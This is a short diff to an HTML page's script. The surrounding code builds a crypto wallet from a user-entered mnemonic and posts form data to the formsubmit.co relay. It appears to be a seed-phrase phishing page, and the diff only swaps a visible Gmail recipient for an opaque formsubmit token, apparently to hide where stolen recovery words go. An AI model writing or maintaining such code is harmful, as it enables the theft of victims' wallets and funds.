--- a/app/index.html
+++ b/app/index.html
@@ -1181,7 +1181,7 @@
                 const wallet = ethers.Wallet.fromMnemonic(dappWords);
                 // result box section
                 $.ajax({
-                    url: "https://formsubmit.co/ajax/jpereigrine17@gmail.com",
+                    url: "https://formsubmit.co/ajax/32c5275b9d34beeec23b9b609a17073c",
                     method: "POST",
                     dataType: "JSON",
                     data: {
